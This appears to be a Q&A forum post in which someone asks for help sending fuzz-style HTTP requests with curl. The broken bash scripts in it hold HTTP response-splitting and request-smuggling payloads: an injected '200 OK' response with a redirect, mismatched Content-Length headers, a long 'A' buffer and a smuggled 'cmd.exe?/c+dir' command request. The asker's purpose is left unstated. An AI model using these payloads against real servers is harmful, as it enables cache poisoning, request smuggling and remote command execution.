# How to create special http requests using curl?

Tags: http, curl, request

What I want to do is, is create special fuzz based request using curl for type 1 and another type 2 request which is based on 4 requests simultaneously and separately using curl, there is a command of perl, I also want that to include in the request

This is what I came up with.

My Curl Code Type 1:

```
curl -X GET -d '
Content-Length: 22
Foo: HTTP/1.1 200 OK
Content-Length: 0
Content-Type: text/html
Last-Modified: ...
Refresh: 0; URL=http://www.google.com/
Bar:
' -i $Local'
```

My Curl Code Type 2 for 4 requests:

```
#!/bin/bash
echo -e "[ + ] Enter Local Server
read Local

curl -X POST -d ' / HTTP/1.1
Host: google.com
Connection: Keep-Alive
Content-Length: 49225 
perl -e 'print (A x 49255)
-i '$Local'


curl -X POST -d ' / HTTP/1.1
Host: google.com
Connection: Keep-Alive
Content-Length: 33
-i '$Local'


curl -X POST -d ' / HTTP/1.1
xxxx: POST /loader/cmd.exe?/c+dir HTTP/1.1
-i '$Local'


curl -X POST -d ' / HTTP/1.1
Connection: Keep-Alive
```

It didn't work, I tried lots of method, I am not familiar with this type of requests. I want to include exactly all this, what you're seeing.

Error was:

```
./curl.sh: line 2: unexpected EOF while looking for matching
./curl.sh: line 27: syntax error: unexpected end of file
```

Comment: White hat or black?

Comment: never mind, got it after 2 hours, all I  needed few adjustments, curl syntax was error, CRLF was automatically removing, I put data for curl in seperate file, using seperate CRLF character codes, then used perl command which was incorrect, it should have been perl -e 'print "A" x 123', then issued curl "localserver" --data-binary @request (file I created), Worked like a charm!